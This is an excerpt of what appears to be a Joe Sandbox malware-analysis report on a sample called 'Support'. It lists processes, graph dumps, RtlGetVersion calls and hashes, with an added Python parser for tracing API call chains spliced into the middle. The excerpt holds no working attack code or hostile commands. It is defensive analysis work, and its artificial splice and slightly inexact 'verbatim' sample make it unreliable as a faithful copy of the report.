                                                                                                                                        Imagebase:0x7ff6ee970000
                                                                                                                                        File size:329'504 bytes
                                                                                                                                        MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:15
                                                                                                                                        Start time:14:05:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                        Imagebase:0x7ff7ca9b0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:16
                                                                                                                                        Start time:14:05:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                        Imagebase:0x7ff7ca9b0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:17
                                                                                                                                        Start time:14:05:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                        Imagebase:0x7ff7ca9b0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:23
                                                                                                                                        Start time:14:06:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                        Imagebase:0x7ff731050000
                                                                                                                                        File size:468'120 bytes
                                                                                                                                        MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:24
                                                                                                                                        Start time:14:06:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff772470000
                                                                                                                                        File size:862'208 bytes
                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true


                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:13.6%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:20%
                                                                                                                                          Total number of Nodes:25
                                                                                                                                          Total number of Limit Nodes:2
                                                                                                                                          execution_graph 27409 1c518d8 27410 1c518e8 27409->27410 27413 1c519e0 27410->27413 27414 1c519ee 27413->27414 27415 1c51935 27413->27415 27419 1c541e0 27414->27419 27424 1c541f0 27414->27424 27420 1c541e8 27419->27420 27429 5f414c0 27420->27429 27433 5f414b0 27420->27433 27421 1c543ed 27425 1c5420f 27424->27425 27427 5f414c0 RtlGetVersion 27425->27427 27428 5f414b0 RtlGetVersion 27425->27428 27426 1c543ed 27427->27426 27428->27426 27430 5f414ce 27429->27430 27431 5f414d4 27429->27431 27437 5f42d07 27430->27437 27431->27421 27434 5f414c0 27433->27434 27435 5f414d4 27434->27435 27436 5f42d07 RtlGetVersion 27434->27436 27435->27421 27436->27435 27439 5f42d1d 27437->27439 27438 5f42e2c 27438->27431 27439->27438 27440 5f42f23 RtlGetVersion 27439->27440 27441 5f42fca 27440->27441 27441->27431
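Added example, not part of the Joe Sandbox report and not Joe Security's own tooling: a small Python parser for the execution_graph and control_flow_graph dumps in this report, so an analyst can recover the call chain that leads to each API hit (here the RtlGetVersion calls) instead of reading the rendered graph. The token grammar (decimal node id, hex address or start-end range, optional "call <addr>", "call <addr> * N" or bare API-name annotations, "a->b" edges) is inferred from the dumps on this page and is an assumption, as is the rule that addresses are at least seven hex digits so they can be told apart from node ids. The sample inputs are the execution graph above and the 5f42d07 control-flow graph from later in this report, plus a one-node fragment from the 5f4ba50 graph for the "* N" case; all three are copied from the page, nothing else is constructed.

```python
import re
from collections import defaultdict, deque

# Assumed token grammar of Joe Sandbox graph dumps: decimal node ids, addresses
# of >= 7 hex digits (optionally "start-end"), edges written as "a->b".
EDGE_RE = re.compile(r"(\d+)->(\d+)")
ID_RE = re.compile(r"\d+")
ADDR_RE = re.compile(r"[0-9a-f]{7,}(?:-[0-9a-f]{7,})?")


def parse_graph(text):
    """Parse an execution_graph or control_flow_graph dump.

    Returns (nodes, edges): nodes maps id -> {"addr", "calls", "apis"},
    edges maps id -> set of successor ids. Annotation tokens that follow a
    node definition ("call <addr>", "call <addr> * N", or a bare API name)
    attach to that node until the next node definition or edge token.
    """
    tokens = text.split()
    if tokens and tokens[0] in ("execution_graph", "control_flow_graph"):
        tokens = tokens[1:]
    nodes, edges = {}, defaultdict(set)
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.fullmatch(tok)
        if m:
            edges[int(m.group(1))].add(int(m.group(2)))
            current = None
            i += 1
            continue
        if ID_RE.fullmatch(tok) and i + 1 < len(tokens) and ADDR_RE.fullmatch(tokens[i + 1]):
            current = int(tok)
            nodes[current] = {"addr": tokens[i + 1], "calls": [], "apis": []}
            i += 2
            continue
        if current is None:
            raise ValueError(f"unexpected token {tok!r} at position {i}")
        if tok == "call" and i + 1 < len(tokens):
            nodes[current]["calls"].append(tokens[i + 1])
            i += 2
        elif tok == "*" and i + 1 < len(tokens) and nodes[current]["calls"]:
            # "call X * N": the block calls X N times; repeat the last target
            last = nodes[current]["calls"][-1]
            nodes[current]["calls"].extend([last] * (int(tokens[i + 1]) - 1))
            i += 2
        else:
            nodes[current]["apis"].append(tok)
            i += 1
    return nodes, dict(edges)


def entry_nodes(nodes, edges):
    """Nodes with no predecessor (the roots of the dump), sorted by id."""
    targets = {s for succ in edges.values() for s in succ}
    return sorted(n for n in nodes if n not in targets)


def api_call_sites(nodes):
    """Map each API name to the sorted start addresses of the nodes invoking it."""
    sites = defaultdict(set)
    for info in nodes.values():
        for api in info["apis"]:
            sites[api].add(info["addr"].split("-")[0])
    return {api: sorted(addrs) for api, addrs in sites.items()}


def shortest_paths_to_apis(nodes, edges, entry):
    """BFS from entry; shortest path (list of ids) to every reachable API node."""
    parent = {entry: None}
    queue = deque([entry])
    while queue:
        n = queue.popleft()
        for s in sorted(edges.get(n, ())):  # sorted for deterministic paths
            if s not in parent:
                parent[s] = n
                queue.append(s)
    paths = {}
    for nid, info in nodes.items():
        if info["apis"] and nid in parent:
            path, cur = [], nid
            while cur is not None:
                path.append(cur)
                cur = parent[cur]
            paths[nid] = path[::-1]
    return paths


def describe(text):
    """Human-readable summary: node/edge counts and one address chain per API hit."""
    nodes, edges = parse_graph(text)
    entries = entry_nodes(nodes, edges)
    lines = [f"{len(nodes)} nodes, {sum(len(s) for s in edges.values())} edges, entry nodes {entries}"]
    for entry in entries:
        for nid, path in sorted(shortest_paths_to_apis(nodes, edges, entry).items()):
            chain = " -> ".join(nodes[n]["addr"] for n in path)
            lines.append(f"  {chain}  ({', '.join(nodes[nid]['apis'])})")
    return "\n".join(lines)


# Sample inputs copied verbatim from this report.
EXEC_GRAPH = ("execution_graph 27409 1c518d8 27410 1c518e8 27409->27410 27413 1c519e0 27410->27413 27414 1c519ee 27413->27414 27415 1c51935 27413->27415 27419 1c541e0 27414->27419 27424 1c541f0 27414->27424 27420 1c541e8 27419->27420 27429 5f414c0 27420->27429 27433 5f414b0 27420->27433 27421 1c543ed 27425 1c5420f 27424->27425 27426 1c543ed 27427 5f414c0 RtlGetVersion 27425->27427 27428 5f414b0 RtlGetVersion 27425->27428 27427->27426 27428->27426 27430 5f414ce 27429->27430 27431 5f414d4 27429->27431 27437 5f42d07 27430->27437 27431->27421 27434 5f414c0 27433->27434 27435 5f414d4 27434->27435 27436 5f42d07 RtlGetVersion 27434->27436 27435->27421 27436->27435 27439 5f42d1d 27437->27439 27438 5f42e2c 27438->27431 27439->27438 27440 5f42f23 RtlGetVersion 27439->27440 27441 5f42fca 27440->27441 27441->27431")
CFG_5F42D07 = ("control_flow_graph 377 5f42d07-5f42de6 390 5f42e58-5f42e6d 377->390 391 5f42de8-5f42dfc 377->391 398 5f42ead-5f42ec8 390->398 399 5f42e6f-5f42e8b 390->399 394 5f42e02 391->394 395 5f42dfe-5f42e00 391->395 396 5f42e05-5f42e26 call 5f42560 394->396 395->396 406 5f42e2c-5f42e57 396->406 407 5f42ef8-5f42f1e 396->407 405 5f42eca-5f42ece 398->405 411 5f42e95-5f42eab 399->411 412 5f42e8d 399->412 409 5f42ed0 405->409 410 5f42ed9 405->410 419 5f42f20-5f42f21 407->419 420 5f42f23-5f42fc8 RtlGetVersion 407->420 409->410 410->407 411->405 412->411 419->420 421 5f42fd1-5f43014 420->421 422 5f42fca-5f42fd0 420->422 426 5f43016 421->426 427 5f4301b-5f43022 421->427 422->421 426->427")
CALL_FRAGMENT = "control_flow_graph 725 5f4ba7d-5f4baf2 call 5f4b338 * 2 call 5f4a9d8"

if __name__ == "__main__":
    print(describe(EXEC_GRAPH))
    print(describe(CFG_5F42D07))
```

Running describe on the execution graph reports 25 nodes (matching the "Total number of Nodes" figure above), a single entry node, and four RtlGetVersion chains, all rooted at 1c518d8 and passing through 1c541e0/1c541f0; the control-flow graph of 5f42d07 shows the single block (5f42f23-5f42fc8) that issues the call. The BFS is the analyst-facing part: it answers "which entry point reaches this API, by what route" without a rendered picture.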

                                                                                                                                          Control-flow Graph

                                                                                                                                          control_flow_graph 66 5f487d8-5f48823 call 5f43690 207 5f48825 call 5f44e40 66->207 208 5f48825 call 5f49450 66->208 209 5f48825 call 5f487d8 66->209 210 5f48825 call 5f487c8 66->210 70 5f4882b-5f4888d call 5f4a0f0 214 5f4888f call 5f4f475 70->214 215 5f4888f call 5f4f55e 70->215 76 5f48895-5f488ff 219 5f48901 call 5f62c90 76->219 220 5f48901 call 5f62c81 76->220 82 5f48907-5f4894b 211 5f4894d call 5f62c90 82->211 212 5f4894d call 5f62c81 82->212 86 5f48953-5f489f4 93 5f49445-5f494e5 call 5f44e40 call 5f49b58 86->93 94 5f489fa-5f48a2f 86->94 113 5f494eb-5f49534 93->113 94->93 97 5f48a35-5f48a6a 94->97 97->93 101 5f48a70-5f48aa5 97->101 101->93 104 5f48aab-5f48ae0 101->104 104->93 107 5f48ae6-5f48b1b 104->107 107->93 112 5f48b21-5f48b3c 107->112 115 5f48b42-5f48b6e 112->115 116 5f48bcb-5f48bde 112->116 123 5f48b70-5f48bb4 115->123 124 5f48bbc-5f48bc5 115->124 118 5f48bf7-5f48c06 116->118 119 5f48be0-5f48bf5 116->119 121 5f48c0c-5f48c33 call 5f649e0 118->121 119->121 127 5f48c35-5f48cac 121->127 128 5f48cae-5f48ccb 121->128 123->124 124->115 124->116 127->128 134 5f48ccd-5f48ce2 127->134 130 5f48ce8-5f49033 128->130 179 5f491cd-5f491e9 130->179 180 5f49039-5f491b1 130->180 134->130 182 5f491f7 179->182 183 5f491eb 179->183 217 5f491b3 call 5f64c90 180->217 218 5f491b3 call 5f64c50 180->218 182->93 183->182 204 5f491b9-5f491c7 204->179 204->180 207->70 208->70 209->70 210->70 211->86 212->86 214->76 215->76 217->204 218->204 219->82 220->82
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074569896.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f40000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                          • Opcode ID: 5bd3622464959e9c7ea725ec7c0854acf58d05f0b0f1ca020e67387ea430b6d0
                                                                                                                                          • Instruction ID: 47f0dbed97dc0f26db9fb1873bea2c23fca29fcdd296899199b920ca1ba0b3f9
                                                                                                                                          • Opcode Fuzzy Hash: 5bd3622464959e9c7ea725ec7c0854acf58d05f0b0f1ca020e67387ea430b6d0
                                                                                                                                          • Instruction Fuzzy Hash: CE624934A41218CFDB15DF64D854B9DBBB2FB89301F20C1A9E909A7351DB79AD82CF90

                                                                                                                                          Control-flow Graph

                                                                                                                                          control_flow_graph 221 5f487c8-5f48823 call 5f43690 367 5f48825 call 5f44e40 221->367 368 5f48825 call 5f49450 221->368 369 5f48825 call 5f487d8 221->369 370 5f48825 call 5f487c8 221->370 226 5f4882b-5f4888d call 5f4a0f0 374 5f4888f call 5f4f475 226->374 375 5f4888f call 5f4f55e 226->375 232 5f48895-5f488ff 364 5f48901 call 5f62c90 232->364 365 5f48901 call 5f62c81 232->365 238 5f48907-5f4894b 371 5f4894d call 5f62c90 238->371 372 5f4894d call 5f62c81 238->372 242 5f48953-5f489f4 249 5f49445-5f494e5 call 5f44e40 call 5f49b58 242->249 250 5f489fa-5f48a2f 242->250 269 5f494eb-5f49534 249->269 250->249 253 5f48a35-5f48a6a 250->253 253->249 257 5f48a70-5f48aa5 253->257 257->249 260 5f48aab-5f48ae0 257->260 260->249 263 5f48ae6-5f48b1b 260->263 263->249 268 5f48b21-5f48b3c 263->268 271 5f48b42-5f48b6e 268->271 272 5f48bcb-5f48bde 268->272 279 5f48b70-5f48bb4 271->279 280 5f48bbc-5f48bc5 271->280 274 5f48bf7-5f48c06 272->274 275 5f48be0-5f48bf5 272->275 277 5f48c0c-5f48c33 call 5f649e0 274->277 275->277 283 5f48c35-5f48cac 277->283 284 5f48cae-5f48ccb 277->284 279->280 280->271 280->272 283->284 290 5f48ccd-5f48ce2 283->290 286 5f48ce8-5f49033 284->286 335 5f491cd-5f491e9 286->335 336 5f49039-5f491b1 286->336 290->286 338 5f491f7 335->338 339 5f491eb 335->339 362 5f491b3 call 5f64c90 336->362 363 5f491b3 call 5f64c50 336->363 338->249 339->338 360 5f491b9-5f491c7 360->335 360->336 362->360 363->360 364->238 365->238 367->226 368->226 369->226 370->226 371->242 372->242 374->232 375->232
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074569896.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f40000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                          • Opcode ID: 715a028382fb78aa5ede12c10e59d5fbc8c337bddde04d70bf1cc52dc00c76a6
                                                                                                                                          • Instruction ID: fb8a4daecb13a0922557259645580502c27294f1f6e303b1fc03641eaf9a6c8e
                                                                                                                                          • Opcode Fuzzy Hash: 715a028382fb78aa5ede12c10e59d5fbc8c337bddde04d70bf1cc52dc00c76a6
                                                                                                                                          • Instruction Fuzzy Hash: CE423934A41218CFDB15DF24D858B99BBB2FB89301F24C1D9E909A7351DB79AD82CF90

                                                                                                                                          Control-flow Graph

                                                                                                                                          control_flow_graph 377 5f42d07-5f42de6 390 5f42e58-5f42e6d 377->390 391 5f42de8-5f42dfc 377->391 398 5f42ead-5f42ec8 390->398 399 5f42e6f-5f42e8b 390->399 394 5f42e02 391->394 395 5f42dfe-5f42e00 391->395 396 5f42e05-5f42e26 call 5f42560 394->396 395->396 406 5f42e2c-5f42e57 396->406 407 5f42ef8-5f42f1e 396->407 405 5f42eca-5f42ece 398->405 411 5f42e95-5f42eab 399->411 412 5f42e8d 399->412 409 5f42ed0 405->409 410 5f42ed9 405->410 419 5f42f20-5f42f21 407->419 420 5f42f23-5f42fc8 RtlGetVersion 407->420 409->410 410->407 411->405 412->411 419->420 421 5f42fd1-5f43014 420->421 422 5f42fca-5f42fd0 420->422 426 5f43016 421->426 427 5f4301b-5f43022 421->427 422->421 426->427
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074569896.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f40000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 358dff97320fe6b744f4a61ef2cc4ca485411196d38f6c10c25eea3fe7d2a5de
                                                                                                                                          • Instruction ID: 8424daf9fdaf32af44d087d217f5de2b587d5b8f26e017b1ff6c68412a49579e
                                                                                                                                          • Opcode Fuzzy Hash: 358dff97320fe6b744f4a61ef2cc4ca485411196d38f6c10c25eea3fe7d2a5de
                                                                                                                                          • Instruction Fuzzy Hash: 3581F535A053258FEB119B68C8157EEBFB1EF45300F0480AAD145EB391DB789C45CFA5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 07290df4ae730d4b2522a5cfb5d620e91e702cdedaacf5b70a9138e7c285fa16
                                                                                                                                          • Instruction ID: 7e32fceb1f9a5b807210c45d34eed5db512dd21337ab080e885f7008d7d4b3a1
                                                                                                                                          • Opcode Fuzzy Hash: 07290df4ae730d4b2522a5cfb5d620e91e702cdedaacf5b70a9138e7c285fa16
                                                                                                                                          • Instruction Fuzzy Hash: 01B21735A002089FDB14DF68C984EADBBB6FF88310F258569E959AB365DB34EC41CF50

                                                                                                                                          Control-flow Graph

                                                                                                                                          control_flow_graph 722 5f4ba50-5f4ba75 908 5f4ba77 call 5f4ba50 722->908 909 5f4ba77 call 5f4ba41 722->909 725 5f4ba7d-5f4baf2 call 5f4b338 * 2 call 5f4a9d8 737 5f4bbd4-5f4bbde 725->737 738 5f4baf8-5f4bafa 725->738 739 5f4bb00-5f4bb06 738->739 740 5f4bbdf-5f4bc3f 738->740 741 5f4bc46-5f4bcfc 739->741 742 5f4bb0c-5f4bb1e 739->742 740->741 771 5f4bd04-5f4bd0c 741->771 747 5f4bb90-5f4bbc1 call 5f4b7b4 742->747 748 5f4bb20-5f4bb88 742->748 906 5f4bbc3 call 5f4ca88 747->906 907 5f4bbc3 call 5f4ca78 747->907 748->747 765 5f4bbc9-5f4bbce 765->737 765->738 772 5f4bdc0-5f4bdc9 771->772 773 5f4bdd4-5f4bddb 772->773 774 5f4bdcb-5f4bdce 772->774 776 5f4bde1-5f4be20 call 5f4b338 773->776 777 5f4bfbf-5f4bfc8 773->777 774->773 775 5f4bd11-5f4bd1d 774->775 778 5f4bd23-5f4bd3c 775->778 779 5f4bfc9-5f4c03d 775->779 797 5f4be22-5f4be27 776->797 798 5f4be29-5f4be36 776->798 783 5f4bdb3-5f4bdbd 778->783 784 5f4bd3e-5f4bdab 778->784 807 5f4c043-5f4c062 779->807 808 5f4c1dd-5f4c1e7 779->808 783->772 784->783 800 5f4be39-5f4be76 call 5f4a9d8 797->800 798->800 811 5f4bfb0-5f4bfb9 800->811 812 5f4c064-5f4c0c3 call 5f4b338 807->812 813 5f4c0cb-5f4c0da 807->813 811->777 814 5f4be7b-5f4beba 811->814 812->813 813->808 819 5f4c0e0-5f4c119 813->819 829 5f4bf31-5f4bf86 814->829 830 5f4bebc-5f4bf29 814->830 819->808 831 5f4c11f-5f4c122 819->831 829->811 844 5f4bf88-5f4bf8a 829->844 830->829 831->808 833 5f4c128-5f4c12b 831->833 835 5f4c12d-5f4c131 833->835 836 5f4c149-5f4c15b 833->836 838 5f4c133-5f4c137 835->838 839 5f4c13f-5f4c143 835->839 845 5f4c15d-5f4c1c0 836->845 846 5f4c1c8-5f4c1d7 836->846 838->839 839->836 842 5f4c1e8-5f4c23d 839->842 863 5f4c245-5f4c250 842->863 864 5f4c23f 842->864 844->811 847 5f4bf8c-5f4bfab 844->847 845->846 846->808 846->819 847->777 859 5f4bfad 847->859 859->811 865 5f4c252-5f4c259 863->865 866 5f4c25a-5f4c25c 863->866 864->863 865->866 867 5f4c2b2-5f4c31f 866->867 868 5f4c25e-5f4c261 866->868 874 5f4c326-5f4c34d 867->874 868->867 869 5f4c263-5f4c269 868->869 871 5f4c278-5f4c27e 869->871 872 5f4c26b-5f4c270 869->872 873 5f4c284-5f4c294 871->873 871->874 872->871 878 5f4c296-5f4c29c 873->878 879 5f4c2ac-5f4c2b1 873->879 880 5f4c355-5f4c360 874->880 881 5f4c34f 874->881 883 5f4c2a0-5f4c2a2 878->883 884 5f4c29e 878->884 885 5f4c362-5f4c369 880->885 886 5f4c36a-5f4c36c 880->886 881->880 883->879 884->879 885->886 888 5f4c36e-5f4c371 886->888 889 5f4c3a9-5f4c3f1 886->889 888->889 890 5f4c373-5f4c379 888->890 896 5f4c3f8-5f4c40b 889->896 892 5f4c388-5f4c38e 890->892 893 5f4c37b-5f4c380 890->893 895 5f4c390-5f4c3a6 892->895 892->896 893->892 906->765 907->765 908->725 909->725
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074569896.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f40000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 94475645f71fe9c4e24dabb0346a7d3826d1127cc09adb81ce8d03c0a3050494
                                                                                                                                          • Instruction ID: dcb76090d7b7c9db15254f8953243e9435e0fc546f105a761dc7cf92e771e204
                                                                                                                                          • Opcode Fuzzy Hash: 94475645f71fe9c4e24dabb0346a7d3826d1127cc09adb81ce8d03c0a3050494
                                                                                                                                          • Instruction Fuzzy Hash: 28529274A006059FCB15DF69C890AAEBBF2FF88310B148569E516EB3A1DB34ED45CB90

                                                                                                                                          Control-flow Graph

                                                                                                                                          control_flow_graph 0 1c57a10-1c57a1a 1 1c57a1c-1c57a1e 0->1 2 1c57a1f-1c57a32 0->2 1->2 3 1c57a34-1c57a36 2->3 4 1c57a37-1c57a3a 2->4 3->4 5 1c57a3c 4->5 6 1c57a3f-1c57a7f 4->6 5->6 11 1c57a81-1c57a95 6->11 12 1c57abd-1c57ad5 6->12 17 1c57a97 11->17 18 1c57a9e-1c57abb 11->18 15 1c57ad7-1c57aeb 12->15 16 1c57b13-1c57b2b 12->16 24 1c57af4-1c57b11 15->24 25 1c57aed 15->25 22 1c57b2d-1c57b41 16->22 23 1c57b69-1c57b8e 16->23 17->18 18->12 30 1c57b43 22->30 31 1c57b4a-1c57b67 22->31 34 1c57b90-1c57ba4 23->34 35 1c57bcc-1c57c05 23->35 24->16 25->24 30->31 31->23 40 1c57ba6 34->40 41 1c57bad-1c57bca 34->41 47 1c57c07-1c57c1b 35->47 48 1c57c43-1c57c7c 35->48 40->41 41->35 51 1c57c24-1c57c41 47->51 52 1c57c1d 47->52 58 1c57c7e-1c57c92 48->58 59 1c57cba-1c57cc9 48->59 51->48 52->51 62 1c57c94 58->62 63 1c57c9b-1c57cb8 58->63 62->63 63->59
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: #!$K6$7
                                                                                                                                          • API String ID: 0-185628103
                                                                                                                                          • Opcode ID: 0bd16ec92db2b0e0fc5e1fdb33b74627367e8826e9d7cfc64ec513cac703dc64
                                                                                                                                          • Instruction ID: c57c350c668e40c836aded795a9d78ed2c739023a3daa303479cb017493da75d
                                                                                                                                          • Opcode Fuzzy Hash: 0bd16ec92db2b0e0fc5e1fdb33b74627367e8826e9d7cfc64ec513cac703dc64
                                                                                                                                          • Instruction Fuzzy Hash: 696180757003468BC746AB68D49066E3BE3FBC4650398C51AE415CB381FF78DD45DB94

                                                                                                                                          Control-flow Graph (entry basic block 5f68935-5f68d6c; executed/not-executed legend and raw node/edge dump omitted)
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8438e5c25fe1be20ba8be105423bcefa107511ef82bde5bee00696755bf25dde
                                                                                                                                          • Instruction ID: cf9952037647aaa83141c131b95d510d040dd49209fb7e648f3d3c98afe067e5
                                                                                                                                          • Opcode Fuzzy Hash: 8438e5c25fe1be20ba8be105423bcefa107511ef82bde5bee00696755bf25dde
                                                                                                                                          • Instruction Fuzzy Hash: DF118175B052148FC715DB28C46969D7BF2AF4A210B2540AAD442EB7A5CB399C42CBA1

                                                                                                                                          Control-flow Graph (entry basic block 5f62c90-5f62cf8; executed/not-executed legend and raw node/edge dump omitted)
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 779ca0badb40eb155596fe1d3ba552ecfcc67a1172569a837dc4a8273f3b963f
                                                                                                                                          • Instruction ID: 6a6f770dcf28994c140f1c36ecb5e53e795c13b01beb44d95cd987f32fb8d9f1
                                                                                                                                          • Opcode Fuzzy Hash: 779ca0badb40eb155596fe1d3ba552ecfcc67a1172569a837dc4a8273f3b963f
                                                                                                                                          • Instruction Fuzzy Hash: F3C13D35B00119DFCB14DFA9C984AAEBBF6FB88310F148469E915A7354DB34ED41CBA1

                                                                                                                                          Control-flow Graph (entry basic block 5f6645f-5f6652d; executed/not-executed legend and raw node/edge dump omitted)
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ccd0eacc6349ef4ee5c30a2de2f1f3f2e807e9b535183f7539cf221083624e20
                                                                                                                                          • Instruction ID: ac38dad2f931358b854eea002143136c0b344cbfd627c17d24d1ea9c187b23be
                                                                                                                                          • Opcode Fuzzy Hash: ccd0eacc6349ef4ee5c30a2de2f1f3f2e807e9b535183f7539cf221083624e20
                                                                                                                                          • Instruction Fuzzy Hash: CEE13A75A00616CFCB04DF68C584AAAB7F2FF88300B55C569E949EB365EB34ED41CB90

                                                                                                                                          Control-flow Graph (entry basic block 1c5dc59-1c5dc7c; executed/not-executed legend and raw node/edge dump omitted)
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6c641f11c8fd719dc92d76c5279557c99aab176f80cdc7c62ccd02de5b378b8c
                                                                                                                                          • Instruction ID: f5b33f938209a78a5bd86dfbbb0a87ac5df63e0970cae99d0c30e52c5d257b85
